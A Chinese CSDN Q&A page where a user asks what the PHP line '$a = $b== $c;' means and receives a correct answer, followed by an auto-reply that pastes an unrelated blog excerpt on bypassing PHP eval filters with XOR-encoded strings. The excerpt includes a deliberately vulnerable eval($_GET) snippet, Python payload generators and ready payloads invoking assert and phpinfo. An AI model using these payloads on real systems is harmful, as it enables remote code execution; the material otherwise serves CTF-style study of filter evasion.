关于PHP语法的问题

$a = $b== $c;

请问这段PHP代码语法什么意思？之前没遇到过

这行代码的意思是将变量 $b 和 $c 进行比较，并将结果赋值给变量 $a。因为比较运算符“==”返回一个布尔值（true 或 false），所以 $a 的值将是 true 或 false。

您好，我是有问必答小助手，您的问题已经有小伙伴帮您解答，感谢您对有问必答的支持与关注！
PS：问答VIP年卡 【限时加赠：IT技术图书免费领】，了解详情>>> https://vip.csdn.net/askvip?utm_source=1146287632不知道你这个问题是否已经解决, 如果还没有解决的话:

• 这有个类似的问题, 你可以参考下: https://ask.csdn.net/questions/726174
• 你也可以参考下这篇文章：PHP 先返回结果到前端，PHP代码继续执行后续的任务
• 除此之外, 这篇博客: 浅谈PHP代码执行中出现过滤限制的绕过执行方法中的 异或绕过 部分也许能够解决你的问题, 你可以仔细阅读以下内容或者直接跳转源博客中阅读:
  

  适用PHP版本：无限制

  在PHP中两个字符串异或之后，得到的还是一个字符串。
  例如：我们异或 ? 和 ~ 之后得到的是 A
  

  字符：?         ASCII码：63           二进制：  00‭11 1111‬
  字符：~         ASCII码：126          二进制：  0111 1110‬
  异或规则：
  1   XOR   0   =   1
  0   XOR   1   =   1
  0   XOR   0   =   0
  1   XOR   1   =   0
  上述两个字符异或得到 二进制：  0100 0001
  该二进制的十进制也就是：65
  对应的ASCII码是：A
  

  接下来看一道例题：

  <?php
  highlight_file(__FILE__);
  error_reporting(0);
  if(preg_match('/[a-z0-9]/is', $_GET['shell'])){
  	echo "hacker!!";
  }else{
  	eval($_GET['shell']);
  }
  ?>
  

  过滤了所有英文字母和数字，但是我们知道ASCII码中还有很多字母数字之外的字符，利用这些字符进行异或可以得到我们想要的字符

  PS：取ASCII表种非字母数字的其他字符，要注意有些字符可能会影响整个语句执行，所以要去掉如：反引号，单引号

  脚本如下：

  # -*- coding: utf-8 -*-
  
  payload = "assert"
  strlist = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 35, 36, 37, 38, 40, 41, 42, 43, 44, 45, 46, 47, 58, 59, 60, 61, 62, 63, 64, 91, 93, 94, 95, 96, 123, 124, 125, 126, 127]
  #strlist是ascii表中所有非字母数字的字符十进制
  str1,str2 = '',''
  
  for char in payload:
      for i in strlist:
          for j in strlist:
              if(i ^ j == ord(char)):
                  i = '%{:0>2}'.format(hex(i)[2:])
                  j = '%{:0>2}'.format(hex(j)[2:])
                  print("('{0}'^'{1}')".format(i,j),end=".")
                  break
          else:
              continue
          break
  

  一次代码执行只能得到我们想要执行语句的字符串，并不能执行语句，所以需要执行两次代码执行，构造

  assert($_GET[_]);
  

  使用脚本对每个字母进行转换，然后拼接

  $_=('%01'^'%60').('%08'^'%7b').('%08'^'%7b').('%05'^'%60').('%09'^'%7b').('%08'^'%7c');
  //$_='assert';
  $__='_'.('%07'^'%40').('%05'^'%40').('%09'^'%5d');
  //$__='_GET';
  $___=$$__;
  //$___='$_GET';
  $_($___[_]);
  //assert($_GET[_]);
  

  payload

  $_=('%01'^'%60').('%08'^'%7b').('%08'^'%7b').('%05'^'%60').('%09'^'%7b').('%08'^'%7c');$__='_'.('%07'^'%40').('%05'^'%40').('%09'^'%5d');$___=$$__;$_($___[_]);&_=phpinfo();
  

  
  经本地测试，发现这种方法可以在php5以及php7.0.9版本种使用，因为assert()的问题，并不是异或不能使用
  注：PHP5低版本有些可能因为magic_quotes_gpc开启的关系导致无法利用
  
  当过滤字符的范围没有那么大，或者只是过滤关键字的时候可以使用如下脚本

  # -*- coding: utf-8 -*-
  import string
  
  char = string.printable
  cmd = 'system'
  tmp1,tmp2 = '',''
  for res in cmd:
      for i in char:
          for j in char:
              if(ord(i)^ord(j) == ord(res)):
                  tmp1 += i
                  tmp2 += j
                  break
          else:
              continue
          break
  print("('{}'^'{}')".format(tmp1,tmp2))
  

  PS C:\Users\Administrator> php -r "var_dump('000000'^'CICDU]');"
  Command line code:1:
  string(6) "system"
  

  
  再放个网上看到的payload

  ${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo
  //${_GET}{%ff}();&%ff=phpinfo
  

• 您还可以看一下 翟东平老师的支付宝小程序3/3阶段_支付宝支付PHP版课程中的 1.[免费]支付宝小程序支付_开篇小节, 巩固相关知识点
  

如果你已经解决了该问题, 非常希望你能够分享一下解决方案, 写成博客, 将相关链接放在评论区, 以帮助更多的人 ^-^